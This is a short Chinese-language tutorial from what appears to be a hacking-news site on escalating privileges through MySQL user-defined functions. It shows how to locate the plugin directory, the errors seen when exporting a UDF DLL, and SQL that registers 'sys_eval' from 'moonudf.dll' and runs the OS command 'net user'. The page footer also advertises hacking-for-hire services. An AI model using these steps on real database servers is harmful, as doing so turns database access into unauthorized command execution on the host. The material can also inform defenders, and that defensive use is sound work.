mysql udf 提权
手机扫一扫
黑客病毒漏洞黑防入侵DDOS病毒硬件
黑资讯> 黑客资讯>mysql udf 提权

mysql udf 提权

黑客资讯访客1970-01-01 8:00:002973A+A-

1、 简介


在mysql 可以使用自定义函数进行提权,udf = userdefined function 用户自定义函数

对于自定义的函数 在mysql5.1版本以后就需要放在插件插件目录/lib/plugin ,文件后缀微

dll,c语言编写

 

2、 插件目录

 

可以使用语句查询plugin插件目录

show variableslike "%plugin%"

D:\phpStudy\MySQL\lib\plugin\

 

3、 使用udf提权


导出udf

1559911116512508.png

 

版本有32卫 和64位的mysql udf也是一样

导出的时候出错

这种是mysql默认设置是不允许导入导出

The MySQL server is running with the --secure-file-priv option soit cannot execute this statement

这种是没有权限导出
Can't create/write to file'D:\phpStudy\MySQL\lib\plugin\moonudf.dll

查看是否存在plugin目录 没有则创建目录

权限不够

 

                             
2创建函数

create function sys_eval returns string soname 'moonudf.dll'

 

3 执行命令

 

select sys_eval('net user')

2.png

点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
黑客网站黑客接单黑客技术黑客工具网络安全渗透测试编程技术免费黑客学习网

相关文章

  • 3条评论
  • 闹旅殊姿2022-06-02 12:07:09
  • g with the --secure-file-priv option soit cannot execute this statement这种是没有权限导出Can't create/write to file'D:\phpStudy\MySQL\lib\plugin\moonudf.dll查看是
  • 囤梦绮筵2022-06-02 09:49:28
  • name 'moonudf.dll' 3 执行命令 select sys_eval('net user')
  • 森槿鸢栀2022-06-02 17:13:51
  • 就需要放在插件插件目录/lib/plugin ,文件后缀微dll,c语言编写 2、 插件目录 可以使用语句查询plugin插件目录show variableslik
发表评论

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理